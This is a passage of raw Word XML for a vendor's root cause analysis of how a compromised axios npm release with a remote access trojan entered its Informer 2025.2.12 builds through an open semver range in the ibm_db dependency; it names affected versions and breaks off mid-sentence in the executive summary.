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F9F7" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="18" w:space="8" w:color="3498DB"/>
        </w:pBdr>
        <w:spacing w:beforeAutospacing="1" w:after="300"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:kern w:val="2"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Root Cause Analysis: Informer 2025.2.12 Exposure to Axios </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:kern w:val="2"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:kern w:val="2"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Supply Chain Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CF9F8" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="75" w:after="75"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Date:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> April 8, 2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CF9F9" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="75" w:after="75"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Severity:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Critical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CF9FA" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="75" w:after="75"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Status: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation Complete; Prevention </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>In</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Progress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CF9FB" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="75" w:after="75"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Affected Release: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Informer 2025.2.12 GA (March 31, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2026</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> build </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>distributables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CF9FC" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="75" w:after="75"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Threat Actor: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Sapphire Sleet (North Korean state actor) [attributed by Microsoft Threat Intelligence]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CF9FD" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="6" w:color="ECF0F1"/>
        </w:pBdr>
        <w:spacing w:before="450" w:after="225"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri;Arial;sans-serif" w:hAnsi="Calibri;Arial;sans-serif" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:color w:val="1A3C6E"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="33"/>
          <w:szCs w:val="33"/>
        </w:rPr>
        <w:t>1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CF9FE" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">On April 8, 2026, a client’s security scan identified an attempted attack by the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>axios</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> library version </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>1.14.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> a known compromised package containing a Remote Access Trojan (RAT), present in their Informer 2025.2.12 installation. Investigation confirmed that the compromised version had entered Entrinsik's internal </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Sonatype</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nexus </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> proxy-repository cache and was subsequently included in all Informer 2025.2.12 GA build </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>distributables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> created on March 31, 2026.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CF9FF" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The compromise originated from a sophisticated supply chain attack against the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>axios</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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package on the public </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> registry (attributed by Microsoft Threat Intelligence to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Sapphire Sleet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, a North Korean state-sponsored threat actor). The attacker hijacked a legitimate </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>axios</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> maintainer's </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> account and published malicious versions (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>1.14.1</w:t>
      </w:r>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and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>0.30.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>) that injected a fake dependency (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>plain-crypto-js@4.2.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">) whose </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>postinstall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>script silently downloaded and executed a cross-platform RAT with command-and-control (C2) capabilities, reboot persistence (on Windows), and anti-forensics measures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFA00" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The compromised </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t xml:space="preserve">axios@1.14.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">entered Entrinsik's Nexus cache because </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>an</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">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install</w:t>
      </w:r>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targeting the Nexus proxy was performed during the approximately </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2-hour-and-54-minute window</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the night of March 30, 2026 (EDT) when the malicious version was live on public </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">. While Informer's own direct dependency on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>axios</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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is correctly pinned at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>1.11.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>ibm_db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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package, a separate direct dependency, declares </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>axios</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>": "^1.12.0"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, an open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>semver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> range that </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>1.11.0</w:t>
      </w:r>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does not satisfy. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>npm’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> dependency resolver on therefore resolved a separate copy of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>axios</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>ibm_db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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and, having no local cached version-satisfying nor </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>lockfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> entry dictating otherwise, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
